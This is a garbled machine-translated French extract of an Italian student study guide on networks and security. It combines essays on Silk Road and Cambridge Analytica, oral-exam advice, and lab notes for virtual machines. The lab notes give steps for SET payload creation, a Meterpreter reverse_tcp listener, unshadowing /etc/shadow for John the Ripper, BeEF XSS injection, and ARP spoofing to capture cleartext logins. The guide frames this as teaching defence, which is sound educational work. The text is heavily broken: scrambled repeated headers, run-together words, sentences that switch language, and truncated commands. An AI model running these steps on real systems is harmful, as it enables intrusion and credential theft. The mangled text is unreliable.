Ils avaient été ignorés. Étant donné la réponse affirmative de la part des experts, Reagan a fait promulguer
les premières lois relatives aux délits informatiques (le Computer Fraud and Abuse Act) et
intensifier les mesures de sécurité par une directive classée (la NSDD-145) contre
les menaces informatiques.
Malgré les actes et les directives, cela démontre toujours que l'homme est toujours le point faible.
GU
D
IE
DE
T
SIHÈME
E
SR
TÉSEAUX
POUR
AUT
E
OÉ
T
S
.T
O
.U
P
.T
D
P
SIANTS
ridurre il ritardo nel lancio di un missile durante una crisi militare, nel caso in cui il
Le président ne se souvient pas du mot de passe.
GLOSSAIRE
La tromperie cybernétique : c'est l'ensemble des techniques et des stratégies fondées sur la tromperie
potentiels attaquants à un système. Il repose généralement sur le détournement, le drainage de
ressources (par exemple avec de fausses informations et des systèmes leurre, des pièges à miel), sur l'effet
Farewell (cela fait douter l'adversaire de l'intégrité des données volées, le nom est lié à
une opération de la CIA contre le KGB dans les années 80), sur l'analyse des modalités de
opération et réaction de l'adversaire (une fois identifié, on essaie de l'attaquer
directement, pour apprendre de nouvelles informations), et sur l'identification à travers des mines et
trappole
GU
D
IT
D
E
S
H
E
IÈME
R
S
TÉSEAUX
POUR
L
A
ES
U
É
T
T.U
O
T
.D
O
S
A
.IT
P
N
P
S
ITS
APPROFONDIMENTI:
LÉGALITÉ
ET
DEEP
WEB
CN
IEFORUM
"W
- EB
PROFOND"
Deep Web raconte l'arrestation en 2013 de Ross Ulbricht, alors âgé de 29 ans, jeune
insoupçonnable, diplômé en Physique et accusé d'être connu sur Internet sous le nom de "Dread Pirate"
Roberts". Il se base sur des interviews exclusives des parents d'Ulbricht, devenus des publics
soutiens des droits numériques et du juste procès. Ulbricht a fondé Silk Road, tristement célèbre
marché noir en ligne mieux connu pour le trafic de drogues, de médicaments, d'armes, de données de compte
bancari, matériel pédopornographique, services criminels sur commande. Sur le portail, les utilisateurs
ils s'enregistraient (anonymement évidemment) en utilisant la plateforme pour vendre et
acquérir, comme cela se passe sur eBay ou Amazon. Silk Road gagnait un pourcentage sur les
transactions, mais théoriquement il ne vendait rien directement, c'étaient les utilisateurs. Tout comme
eBay. Le documentaire décrit et approfondit les enquêtes qui ont conduit à l'arrestation de
jeune, (ultérieurement condamné à la réclusion à perpétuité en 2017, jugement considéré par beaucoup
exagérée, mais à son tour nécessaire et exemplary de la part du gouvernement des États-Unis pour donner
un fort signal à ceux qui pensent exploiter l'anonymat du Dark Web à des fins criminelles), et
Explorez avec des interviews exclusives d'experts et de professionnels du Deep Web et du système des Bitcoins
aspects éthiques et juridiques de l'avenir du réseau, et de la liberté et responsabilité des individus sur
web.
Un discours fondamental et délicat est lié à la facilité avec laquelle quiconque pourrait...
anonymat complet s'approcher des drogues via le Dark Web (en donnant en fait la possibilité
même aux plus insoupçonnés ou craintifs de dépasser leurs limites), mais en fait dans un
un environnement plus sûr pour les consommateurs par rapport à la rue (rendant la dégradation et le trafic
Dans tout cela, on se demande quelle est effectivement la
responsabilité d'Ulbricht, de payer seul à la justice une telle note à 29 ans
pour tous les crimes commis via sa plateforme.
GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
E
T
S
T
ÉO
.T
.P
U
.P
T
S
D
IA
INTS
vulnérables.
(D'une lettre d'une mère qui a perdu son fils à cause d'une overdose après avoir acheté de la drogue
sur le portail. Au moins 6 décès confirmés ont été attribués à des overdoses liées à des achats sur
Route de la Soie, pour laquelle Ulbricht a été accusé de responsabilité
GLOSSARIO
Deep Web : la partie du web non indexée par les moteurs de recherche. Elle comprend des sites non
encore indexés, sites privés ou "cachés" par les moteurs de recherche.
Dark Web : c'est une partie du Deep Web développée sur des réseaux particuliers, accessibles avec des systèmes
dédiés (par exemple avec le navigateur TOR). Avec cela, on identifie généralement cette partie de
Web profond destiné à des fins criminelles.
TOR : un navigateur dérivé de Mozilla, open source, qui a pour objectif la navigation
réellement anonyme et non traçable sur internet, à travers un système de routage en oignon.
BitCoin : c'est une cryptomonnaie dont la valeur est déterminée par un mécanisme de demande et
offre. Elle est basée sur une base de données distribuée entre les nœuds du réseau où sont suivis les
transazioni e della loro integrità (dettoblockchain), con impiego di tecniche crittografiche
complètes pour la génération de nouvelles monnaies et la définition de la propriété des monnaies
stesse (via une clé privée utilisée comme signature numérique pour son portefeuille). Le
les transactions en attente sont incluses dans la blockchain par un processus appelé
minage, qui maintient un ordre chronologique dans la blockchain, protège la neutralité de la
réseau et permet à différents ordinateurs de s'accorder sur l'état du système. Les règles
les signatures cryptographiques empêchent qu'un bloc précédent soit modifié, car cela
GUD
IE
ST
S
IHEMEE
ST
RÉSEAUX
POUR
AUTOT
SO
ET
P
É
.P
.T
S
.IU
IDA
INTS
APPROFONDISSEMENTS :
PRO
D
A
'FC
L
ID
B
TA
E
G
O
IT
N
A
L'HISTOIRE
Cambridge Analytica est une société née en 2013 spécialisée dans l'analyse de volumes de données
rassemblés à partir des réseaux sociaux, pour la réalisation de campagnes sociales de conditionnement
psychologique des utilisateurs. Le scandale suscité par les révélations d'anciens employés sur le
sfruttamento inconsapevole dei dati (meglio, dei metadati) di milioni di utenti dei social (in
particulier de Facebook) et sur les effets des campagnes profilées mises en œuvre a conduit à
fermeture de la société en 2018 et une amende de 5 milliards de dollars à Facebook (ce que beaucoup
ils ont évalué comme peu, étant donné qu'ils représentent environ 1 dixième du chiffre d'affaires annuel de l'entreprise,
La société exploitait de grandes données et des techniques psychométriques pour profiler des individus, à travers
l'utilisation d'algorithmes d'analyse des données collectées combinés avec des techniques de « data mining »
(extraction d'informations à partir de grandes quantités de données). Les données sont obtenues à partir de tout ce qui
qu'un utilisateur effectue sur les plateformes, et ces données sont énormes et si variées que
consentir de définir de manière très précise le comportement psychologique et les attitudes
des personnes. Par exemple, ils étaient recueillis (par eux, mais ils sont encore recueillis
probablement d'autres sociétés) des informations sur les likes, sur les réactions à certains articles et
images, à "histoires", non seulement sur les contenus, mais aussi sur les horaires, sur la localisation
géographique, sur les ethnies des personnes représentées dans les contenus commentés, sur le type de
commenti (positivi o negativi). Inoltre si possono raccogliere informazioni tramite contenuti
mirati à montrer aux individus, avec des campagnes sociales développées sur mesure pour voir comment le
le public réagit. Il arrive souvent de trouver des annonces sponsorisées d'articles, de photos, de pages et
simili sur les réseaux sociaux que nous ne "comprenons" pas toujours, au sens où il ne s'agit pas de publicité classique
di un produit, mais peut-être de pages ou de nouvelles "qui pourraient nous intéresser", et non en
nous comprenons donc la raison. Et aussi des fausses actualités spécialement construites. La réaction à
cliquer, commenter, mettre un j'aime, et le croisement de ces données avec des millions d'autres données
permet de faire comprendre à une machine, grâce à des algorithmes appropriés, ce que nous pensons.
GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
E
É
T
SU
O
.D
.PA
.P
T
ISINTS
ton ami (mais nous aurons accès à tout ce que tu fais sur le social)”) mais aussi à celui de
leurs cercles d'amis (fonctionnalité maintenant non présente sur Facebook). Falla qui n'était pas un
un bug, mais une "légèreté" des autorisations, qui permettait à Cambridge Analytica de
accéder à ces données sans violer les conditions de service de Facebook. De cette façon, il a
potu recueillir des données relatives à plus de 80 millions d'utilisateurs. Bien que les gens soient plus
préoccupé que quelqu'un connaisse son mail ou son adresse de résidence, ce n'est pas
suffisamment sensibilisée pour s'inquiéter que quelqu'un collecte des données sur ce qu'elle aime ou
moins, ou sur la manière de commenter un certain contenu.
En plus de ces données, la société achetait des données supplémentaires auprès de sociétés spécialisées, appelées courtiers.
spécialisées dans leur collecte et leur vente. Avec toute cette masse de données, elle a développé un
système de micro-ciblage comportemental, c'est-à-dire envoyer des contenus avec un haut niveau
personnalisation individuelle. On travaille sur les réactions et le comportement de l'utilisateur, et non
sur les préférences et les goûts personnels. Avec ces informations, la société était en mesure de fournir
services de communication stratégique particulièrement appréciés (et efficaces) pour les campagnes
électoraux.
Travoltaparlafuited'informations,desdétailsdesonimplicationontémergé(etdonc
utilisation du micro-ciblage) dans les campagnes qui ont conduit au succès du Brexit au Royaume-Uni
Unito et de la victoire de Trump aux élections présidentielles des États-Unis (comme cas les plus éclatants).
connaissance des nouvelles technologies de la part de ceux qui utilisent le Net, et de la part de ceux qui en
propose, favorise et, parfois, impose une utilisation toujours plus grande et intégrée dans nos
activités quotidiennes.
GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
E
T
S
T
ÉO
.T
.P
U
.P
T
S
D
IA
INTS
Réalisation de Karim Amer et Jehane Noujaim - Genre : Documentaire - USA 2019 - Exclusif
Netflix.
GLOSSARIO
Métadonnées : informations qui décrivent d'autres informations. Elles servent par exemple à améliorer
et d'optimiser l'accès à ces informations au sein d'un système informatique. Dans les systèmes
Dans la messagerie, par exemple, les métadonnées peuvent contenir des informations sur l'heure d'envoi du
message, sur le lieu, s'il a été livré ou vu par le destinataire, etc… Dans un document
Le texte peut concerner l'auteur, le programme avec lequel il a été écrit (Word, Open
Bureau), l’heure à laquelle il a été enregistré, révisé, etc...
Fake News : informations inventées ou déformées, spécialement retravaillées pour les rendre virales
et entre-temps générer des réactions appropriées.
GUD
IE
DE
T
SIHÈMEE
ST
RÉSEAUX
POUR
AUTO
T
E
É
SO
T
.U
P
.P
T
.D
S
IIA
INTS
EXEMPLE
D
SE
MATÉRA
IUX
POUR
LE
COLLOQUES ORAUX
L'épreuve orale de l'examen d'État consiste en un "entretien" qui commence par un
matériel (initialement appelé « enveloppe »), qui contient une image et éventuellement du
texte, constitué d'extraits de textes de littérature, poésies, photographies, articles de journaux,
graphiques, formules, idées de projets, problèmes : cela dépend de la commission. Il ne faut pas
essayer de forcer des liens, ou perdre du temps à chercher tous les détails possibles dans les photos
o "œuf de Pâques": le contenu de l'enveloppe n'est qu'une suggestion pour amorcer l'entretien,
Il est très probable qu'il sera impossible de relier toutes les matières, et surtout ce n'est pas un quiz.
Voici quelques exemples d'enveloppes (liées aux matières de spécialité) utilisées lors des examens précédents,
Avec des indications sur certains sujets auxquels lier les disciplines de spécialisation.
Cette enveloppe peut être reliée à : cryptographie, sécurité des réseaux, protection des données,
communications par réseau, transmissions numériques, réseaux sans fil, IoT.
GU
D
IE
DE
T
SHÈME
E
SR
TÉSEAUP
X
SO
IUR
AUT
E
OÉ
T
S
.T
O
.U
P
.T
D
P
SIANTS
Cette enveloppe peut être liée à : cryptographie, sécurité des communications, vie privée
(Droit et Constitution), Seconde Guerre mondiale.
GUD
IE
ST
S
IHÈMEE
ST
RÉSEAUX
POUR
AUTOT
SO
ET
P
É
.P
.T
S
.IU
IDA
INTS
Cette enveloppe peut être liée à : l'ingénierie sociale, la sécurité des communications,
réglementation sur la protection des données et les crimes informatiques (Droit et Constitution).
GUD
IE
DESYSTÈMEE
ST
RÉSEAUX
POUR
AUTOT
SE
O
ÉT
.P.U
P
T
.S
ID
IA
INTS
NOTES
DE
LABORATOR
IE
Voici des notes brèves et concises sur les programmes, commandes, termes, sites utilisés pour les
exercices, avec quelques rappels sur leur utilisation. Étant donné que de nombreux exemples concernent
vulnérabilités et attaques informatiques, il est bon d'effectuer tout via des machines virtuelles, et
se rappeler que le Code Pénal punit les crimes informatiques (à partir de la loi 547 du
1993) quali :
• fraude informatique
Par conséquent, n'oubliez pas que ce qui est indiqué dans le Guide suit un objectif précis :
APPRENONÀ
SNOUD
SÉFENDRE
ÉTUDIER C COMMENT S'ATTACHER
N.B. :
• Les systèmes d'exploitation et les logiciels sont souvent mis à jour, certains commandes et notes
ils peuvent ne pas fonctionner "toujours", donc considérez le tout comme un point de départ.
GUD
IE
DE
T
SIHÈMEE
ST
RÉSEAUX
POUR
AUTO
T
E
É
SO
T
.U
P
.P
T
.D
S
IIA
INTS
MACHV
N
IR
IETUELLE
VirtualBox : est un logiciel open source propriété d'Oracle pour l'exécution de VM. Pour les
il est particulièrement important de configurer l'expérience de laboratoire
carte réseau virtuelle, selon le mode d'utilisation : NAT (le trafic est
masqué comme s'il provenait de la machine hôte, créant un sous-réseau séparé) ou bien
Bridged (la VM obtient sa propre IP).
Pour partager facilement des fichiers entre l'hôte et le client, vous pouvez activer le partage de fichiers : à partir de
menu de la VM démarrée sélectionner Appareils > Dossiers Partagés > Paramètres des Dossiers
Condivise, dopodiché aggiungere una nuova cartella (icona sulla destra con il +), assegnare
le parcours, sélectionnez Montage Automatique et Rendre Permanent. Sur certaines VM (à
exemple celles avec Windows XP) il sera nécessaire d'installer les Guest depuis Virtual Box
Addition, en sélectionnant dans le menu Dispositifs de la VM "Insérer l'image CD des Invités"
Ajouts.
Kali Linux : la reine des distributions Linux dédiées à la sécurité, basée sur Debian, avec
préinstallé de nombreux outils utiles pour le hacking, le cracking, et plus généralement les tests de pénétration
et l'analyse judiciaire. Certaines versions au format .ova déjà configurées peuvent être téléchargées,
Les données d'accès par défaut peuvent varier en fonction de la version ou si vous avez téléchargé
une version déjà configurée, par exemple un .ova. Typiquement, ce sont root - toor ou kali -
kali.
login: msfadmin
password: msfadmin
Certains exploits utilisables avec Metasploit pour obtenir un shell depuis une machine
Metasploitable (en utilisant l'option « connexion inversée ») :
GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
E
T
S
T
ÉO
.T
.P
U
.P
T
S
D
IA
INTS
VM Windows XP : il est possible d'obtenir une copie d'XP légalement, valable 30 jours.
en la téléchargeant depuis le site de Microsoft en suivant une procédure particulière pour obtenir un fichier image
virtuel à utiliser dans VM. XP se prête particulièrement bien pour effectuer des tests d'intrusion.
TestétantunsystèmeobsolèteetsansplusdesupportdelapartdeMicrosoft(comme
Windows 7, et ils sont encore largement utilisés !
Procédure :
OUT
L
U
IST
L
S
IÉ
D
SAN
SH
S
TER
L
/L
MN
IAL
netstat : fournit des statistiques sur les activités réseau, et des informations sur les ports et adresses sur lesquels
des connexions TCP et UDP sont actives. Fonctionne sous Windows et Linux.
Uso:
ifconfig : su Linux fournit des informations sur sa connexion IP. Avec le paramètre -a
GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
E
T
S
T
ÉO
.T
.P
U
.P
T
S
D
IA
INTS
tracert (sous Windows) et traceroute (sous Linux) : montre tous les sauts qu'un paquet effectue
pour arriver à destination. L'utilisation du paramètre -d ne résout pas les noms des hôtes. Pour
sauvegarder le résultat sur fichier peut être utilisé sur Windows : (exemple)
# tracert [Link] > c:/[Link]
Les valeurs en ms affichées concernent le temps écoulé entre l'expédition et la réception d'un
paquet (si le temps est supérieur à 3s, un astérisque est affiché). Par défaut, il est montré
effectués au maximum 30 sauts, le calcul est effectué en envoyant des paquets ICMP et
attendant la réponse des passerelles traversées (ICMP TIME_EXCEEDED), chaque paquet
a un MAX_TTL (temps de vie) de 1 saut au départ, et ensuite jusqu'à atteindre
30 (à moins qu'il ne soit modifié par l'utilisateur).
sur Linux affiche les tables de routage actuelles, sur Windows doit être utilisé avec le
Le paramètre PRINT sert également à modifier manuellement les tableaux de routage.
ping : est utilisé pour mesurer le temps en ms pris par un paquet ICMP à
atteindre une destination réseau.
Uso:
scansione d'un hôte, sans compléter le 3-way handshake TCP : # nmap -sS [Link]
scansione complète : # nmap -sV [Link]
sortie sur fichier : # nmap -sV -oN [Link] [Link]
scansione sur port : # nmap -sS -p 8080 [Link]
scanne toutes les portes : # nmap -sS -p [Link]
scannage UDP : # nmap -sU -r -v [Link]
GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
E
T
S
T
ÉO
.T
.P
U
.P
T
S
D
IA
INTS
Uso:
# arp-scan —interface=eth0 [Link]/24 :spécifiant l'interface et l'adresse réseau avec
sous-réseau
nslookup : fournit des informations sur les enregistrements NS d'un domaine internet.
Usage :
# nslookup : active la console, les commandes suivantes sont données directement dans celle-ci :
# type=mx :etta come tipo solo i record di posta MX
# [Link]:appuyez sur entrer pour afficher les résultats
# type d'ensemble=ns :setta solo i record NS
# définir type=any : définit tous les enregistrements
OUT
L
G
ISÉNÉR
Q
IUES
OUTL
IDE
LN
IUX
C'est un fichier contenant des noms d'utilisateur, des mots de passe et d'autres éléments à utiliser pour essayer des...
attacchi à dictionnaire. Sur Kali Linux, le répertoire où se trouvent ceux par défaut est /usr/
partager/listes_de_mots/
smtp-user-enum : outil de Kali qui sert à lister l'existence d'utilisateurs sur un serveur de
poste, par l'analyse avec dictionnaire.
Exemple :
# smtp-user-enum -M VRFY -U /usr/share/wordlists/fern-wifi/[Link] -t [Link]
nikto : outil de Kali Linux pour l’analyse des vulnérabilités des applications web, avec lequel on
ils peuvent obtenir de nombreuses informations sur une cible.
Uso:
# nikto -hô[Link]
Metasploit : outil de Kali Linux pour l'utilisation d'exploits connus. Il se lance automatiquement
lanciandoArmitage, une interface graphique particulièrement utile pour faire des tests de pénétration
testing.
N.B. Si elle ne démarre pas automatiquement, lancez les commandes suivantes (ignorer les éventuels
erreurs):
Une fois la machine (ou les machines) cible apparaître, cliquez avec le bouton droit sur la
machine et sélectionner SCAN pour obtenir des informations.
Dans le menu ARMITAGE, sélectionner SET EXPLOIT RANK puis définir sur POOR.
Dans le menu ATTAQUES, sélectionnez TROUVER ATTAQUES et attendez. À la fin, apparaîtra dans
menu (clic droit sur la machine à attaquer) la commande ATTAQUER et vous pourrez
sélectionner les attaques possibles identifiées par Metasploit, qui enverront le payload à
machine cible. Si l'exploit réussit, l'icône de la machine changera et sera
"enveloppé" par des éclairs, indiquant qu'il est maintenant possible d'interagir.
Dans le menu, il est également possible de sélectionner l'option Hail Mary : c'est un commandement démonstratif qui
John the Ripper : c'est un outil pour le craquage des mots de passe.
/etc/passwd est le fichier système de Linux où sont mémorisés les mots de passe (chiffrés, c'est
présente l’hash).
Pour afficher le contenu du fichier : # cat /etc/passwd
Dans le fichier, les hash des mots de passe ne sont pas visibles, pour les révéler et obtenir un fichier à utiliser.
pour essayer de déchiffrer les mots de passe, on utilise la commande unshadow :
# unshadow /etc/passwd /etc/shadow > fichier_hachage (où hashfile est le nom que nous voulons)
dare au fichier contenant les hachages visibles).
Uso:
On peut essayer par exemple sur une machine XP. Depuis Kali Linux, on peut utiliser SET, un outil.
qui se trouve à l'intérieur du groupe Social EngineeringTools. Une fois lancé, sélectionnez :
un exécutable [Link] est créé dans le dossier /root/.usr/[Link] qui devra ensuite
être lancé sur la machine cible.
Une session de Meterpreter sera lancée sur la machine cible dès que le payload sera exécuté.
sur la machine attaquante, sélectionnez ensuite la session avec la commande :
# séances -i n°_session
(voir le numéro dans la liste dans le terminal où apparaît le mot « ouvert »). Par le biais de
La commande help permet d'obtenir une liste des opérations qui peuvent être effectuées sur la cible.
machine, y compris par exemple enregistrer une capture d'écran du bureau ou prendre une photo avec la
webcam (se présente), démarrer des programmes, etc...
Pour relancer le listener s'il devait être éteint (par exemple après un redémarrage
della macchina), avviare msfconsole :
# msfconsole
# utiliser multi/handler
set payload windows/meterpreter/reverse_tcp
# définir LHOST [Link]
# définir LPORT 443
exploiter
BeEF XSS : est un outil de Kali pour tester des attaques de Cross Site Scripting. Il se lance depuis
menu Outils d'Exploitation. Au premier démarrage, il peut demander de modifier les
GU
D
ID
EE
SY
SSTÈME
TS
EM
E
R
TIÉSEAUX
POU
A
R
EU
É
T
T.U
O
T
.D
O
S
A
.IT
P
N
P
S
ITS
Pour le prouver, on peut lancer une machine virtuelle OWASPBWA pour obtenir une page.
vulnérable au XSS, à l'adresse de la machine (d'exemple) [Link]
owaspbricks/content-2/[Link]?user:harry auquel on peut ajouter à la fin de l'URL le script :
dove [Link] est l'IP de la machine Kali où BeEF est en cours d'exécution.
MITM avec arpspoof : arpspoof est un outil de Kali pour effectuer une attaque de poisonnement ARP.
en utilisant des réponses ARP falsifiées, en tirant parti du fait qu'elles ne sont pas vérifiées par
protocole. L'ordinateur qui attaque fait croire au serveur qu'il est le client, et au client qu'il est
le serveur d'une communication, via une attaque MITM.
Installer arpspoof :
Uso:
démarrer une machine Kali et une machine cible, par exemple une VM Windows XP.
Lancer depuis cmd la commande
# arp -a
# arpspoof -i eth0 -t IP_gateway IP_bersaglio : où eth0 est l'interface réseau à utiliser sur
Kali)
# arpspoof -i eth0 -t IP_bersaglio IP_gateway : où eth0 est l'interface réseau à utiliser sur
Kali)
L'attaqueMITMparempoisonnementARP(appeléaussispoofingARP)estlancée,ilestmaintenantpossiblede
vérifier sur la machine cible comment a changé la table ARP. Pour vérifier les effets de
un MITM si può avviare una macchina OWasp di appoggio, che fornisce ad esempio un web
serveur navigable en clair et sans cryptage, auquel on accède depuis un navigateur avechttp://
[Link]/owaspbricks/
Sur la machine Kali, il est possible de lancer divers outils pour intercepter le trafic effectué entre la VM
bersaglio et Owasp simplement en naviguant sur le site :
[Link]==[Link] et [Link]=="POST"
Je suis en train d'essayer d'utiliser la page de connexion d'OWasp, en regardant dans le paquet intercepté dans
claire le nom d'utilisateur et le mot de passe de l'utilisateur.
Unefoisl'attaqueterminée,fermerlesdifférentsterminauxetdésactiverlemodepromiscuous.
# sysctl -w net.ipv4.ip_forward=0
WIRESHARK
Wireshark : est un analyseur de paquets open source utilisé pour analyser le trafic réseau.
Présentez divers outils pour l'inspection des paquets et des protocoles.
Configurations utiles
GU
D
IE
DT
E
SIHÈME
E
ST
RÉSEAUX
POUR
AUTO
E
T
S
T
ÉO
.T
.P
U
.P
T
S
D
IA
INTS
pour filtrer sur les hôtes consultés via une connexion http ou https.
Recherche et filtrage
Rechercher et exporter un contenu depuis HTTP ou autre : se connecter à n'importe quel site et
télécharger un fichier (par exemple un fichier texte ou PDF). Dans le fichier de capture, filtrer avec
# [Link]
pour identifier les sites à partir desquels du contenu a été demandé, il est éventuellement possible de filtrer
ultérieurement avec
en sélectionnant les paquets identifiés par un GET dans le champ info, on peut cliquer sur le menu
Fichier->Exporter Objets->HTTP et sauvegarder le contenu du fichier à partir du fichier de capture.
La même chose peut être faite en déterminant le type de contenu d'un paquet en examinant le
flux TCP, par exemple si l'on identifie du code HTML, on peut exporter l'objet sous forme de fichier
HTML.
Rechercher et exporter un contenu depuis SMTP : typique des logiciels malveillants qui transformé le
# [Link]é[Link]
Rechercher et exporter un contenu depuis FTP : se connecter à n'importe quel serveur FTP et
GU
D
IE
DE
T
SIHÈME
E
SR
TÉSEAUX
POUR
AUT
E
OÉ
T
S
.T
O
.U
P
.T
D
P
SIANTS
# données-ftp
on peut voir ce qui a été transféré, pour sauvegarder un fichier il faut chercher parmi les paquets ceux
con commande RETR (c'est-à-dire ceux qui sont demandés pour être transférés du serveur FTP), à l'intérieur de
pacchetto cercare il nome del file (si trova in FTP DATA [Command: RETR nomefi[Link]]),
donc sélectionnez le paquet, cliquez avec le bouton droit de la souris et sélectionnez SUIVRE -> FLUX TCP,
par exemple
L'opérationd'exportationpeutêtreeffectuéedirectementsurlefichierpcapsansfiltrer,danscecas
Les objets correspondant à la demande sont exportés de cette manière :
pour rechercher parmi les sites visités en HTTP et en HTTPS, appliquer le filtre :
# [Link] ou [Link] == 1
trop denses les fichiers de capture, et en insérant d'éventuels appels DNS qui peuvent révéler
connexions à des serveurs suspects :
# bittorrent
# info_hash= //cherche le hash SHA du fichier demandé via torrent, qui a la forme
/[Link]?info_hash=XXX
Cherchez des informations sur les hôtes : il est possible de filtrer le trafic DHCP pour trouver des informations.
sélectionner un paquet DHCP REQUEST, développer l'onglet Protocole de démarrage, et dans les
L'option permet de trouver l'Identifiant Client (qui contient l'adresse Mac) et le Nom de l'Hôte.
Pour rechercher via un filtre dans les différents contenus des options, ils sont affichés dans un menu à
tendina écrivant :
# [Link]
Étant donné que le trafic DHCP n'est pas fréquent, on peut rechercher les traces NBNS (dûes au
GUD
IE
DE
T
SIHÈMEE
ST
RÉSEAUX
POUR
AUTO
T
E
É
SO
T
.U
P
.P
T
.D
S
IIA
INTS
Filtraggi utili:
# [Link] contient “/90" //filtre les URI qui contiennent /90, dans ce cas il est
fait parce qu'on est à la recherche d'une partie d'URI connue utilisée par un malware
# [Link] contient .exe // filtre les URI qui contiennent un fichier avec l'extension .exe
Ce programme contient "Ce programme" // filtre les paquets qui contiennent en eux la mention
« Ce programme ne peut pas être exécuté en mode DOS. » qui appartient aux fichiers exécutables de Windows, si
# Http contient des posts // filtre les paquets qui contiennent des POST vers des formulaires web
RESOURCESN
L
G
INE
Url Shortner : est un service en ligne qui raccourcit les URL sur le web (par [Link]). Naît
pour simplifier la diffusion des liens, il est cependant particulièrement utilisé pour des attaques
informaticiens (du phishing au XSS), car en masquant l'URL, il n'est pas immédiatement clair
à l'utilisateur sur la destination du lien. Il est également utilisé dans les attaques XSS
juste pour cacher l'ajout à la fin d'une URL d'un script malveillant.
GU
D
IE
DE
T
SIHÈME
E
SR
TÉSEAUX
POUR
AUT
E
OÉ
T
S
.T
O
.U
P
.T
D
P
SIANTS
- [Link] qui collecte des "instantanés" de la majorité des sites web, est
il est possible de le naviguer et d'aller récupérer de vieilles pages et versions des sites.
- [Link]
[Link]: page du site officiel de l'IANA (Internet Assigned Numbers
Autorité) où trouver la liste des « ports bien connus ».
POUR
CONCLURE
Le Guide a déjà remplacé la grande Encyclopédie galactique, comme l'indiscutable dépositaire de tout
la connaissance et la sagesse, pour deux raisons importantes. Premièrement, cela coûte un peu moins cher ; deuxièmement, cela porte l'inscription,
NE PANIQUEZ PAS, rien de paniquer, en grandes lettres rassurantes sur la couverture. « (de 'Guide du voyageur galactique'
recueil mis à jour de sujets d'examen pour le cours ITIS en Informatique et Télécommunications art.
Télécommunicationsavecquelquessolutionsrécupéréessurleréseau.
SimoneZanela
LICENCE
Ce travail est une "Œuvre Culturelle Libre" : "Guide des Systèmes et Réseaux pour Auto-stoppeurs ...et
Les "Étudiants" sont distribués sous Licence Creative Commons Attribution - Partager à
même manière 4.0 International. - [Link]
[Link]
VERSION